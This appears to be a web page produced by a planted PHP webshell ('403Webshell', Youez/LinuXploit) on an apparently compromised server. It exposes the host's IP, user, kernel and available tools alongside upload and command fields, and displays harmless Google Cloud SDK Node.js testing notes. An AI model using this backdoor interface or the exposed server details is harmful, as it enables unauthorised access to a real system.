403Webshell
Server IP : 35.236.43.222  /  Your IP : 216.73.216.143
Web Server : Apache
System : Linux order-form-vm-001 5.10.0-37-cloud-amd64 #1 SMP Debian 5.10.247-1 (2025-12-11) x86_64
User : deploy ( 1002)
PHP Version : 8.1.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /lib/google-cloud-sdk/platform/ext-runtime/nodejs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /lib/google-cloud-sdk/platform/ext-runtime/nodejs/testing.md
Testing Notes
=============

To run the test script (`test/runtime_test.py`) you'll need to install the
Google Cloud SDK add this to your PYTHONPATH:

    export PYTHONPATH=$CLOUD_SDK/lib:$CLOUD_SDK/platform/google_appengine:$PYTHONPATH

Where `$CLOUD_SDK` is the location where the cloud SDK is installed.

Debugging
---------

If you do "sys.stderr.write(...)" from a plugin script, your output will go
to a nice shiny bright warning message.  Exceptions will show up as warning
messages simply by virtue of having been formatted to standard error.

Full logging can be made to happen by adding:

    from googlecloudsdk.core import log
    log.SetVerbosity(logging.DEBUG)

Youez - 2016 - github.com/yon3zu
LinuXploit